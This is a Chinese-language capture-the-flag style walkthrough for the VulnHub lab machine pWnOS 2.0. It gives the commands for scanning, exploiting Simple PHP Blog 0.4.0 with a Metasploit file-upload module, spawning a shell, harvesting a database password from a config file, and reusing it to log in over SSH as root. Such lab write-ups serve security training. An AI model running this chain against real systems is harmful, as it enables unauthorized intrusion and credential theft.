知识点总结:
1.通过模块来寻找漏洞
2.msf查找漏洞
3.通过网站源代码,查看模块信息
环境准备
攻击机:kali2023
靶机:pWnOS v2.0
安装地址:pWnOS: 2.0 (Pre-Release) ~ VulnHub
在安装网址中看到,该靶机静态IP为10.10.10.100
所以我们就要修改虚拟机的"虚拟网络编辑器"
其次靶机的虚拟机设置如下:
开始渗透!
信息收集
收集IP(虽然已经知道了)
arp-scan -l
端口扫描
先大概看一下
nmap 10.10.10.100
再详细看一下
nmap -A -p- 10.10.10.100
看到内核版本等
访问一下80端口
扫一下目录
gobuster dir -u http://10.10.10.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
扫到了/blog目录,访问
查看源代码
查看到建立博客的模块模版是Simple PHP Blog 0.4.0
漏洞查找
msf查找有没有现成的漏洞
search Simple PHP Blog 0.4.0
存在,那我们直接利用
use unix/webapp/sphpblog_file_upload
set Rhost 10.10.10.100
set uri /blog //填有该模块的url,此处写为uri
run //运行
shell //开启命令行
python -c 'import pty;pty.spawn("/bin/bash")' //优化命令行
提权
查看一下目录
存在文件:mysqli_connect.php,看看
拿到数据库root密码,登录
看看能不能拿到相关账户密码,分别执行下述命令爆库
show databases;
use mysql;
show tables;
select * from user;
最后看到
看到root的好多密码都是一致的,具体解密我也不知道,所以没有解密成功!
但是我们可以用上面的那个密码再登录一下ssh试试
ssh root@10.10.10.100
成功root!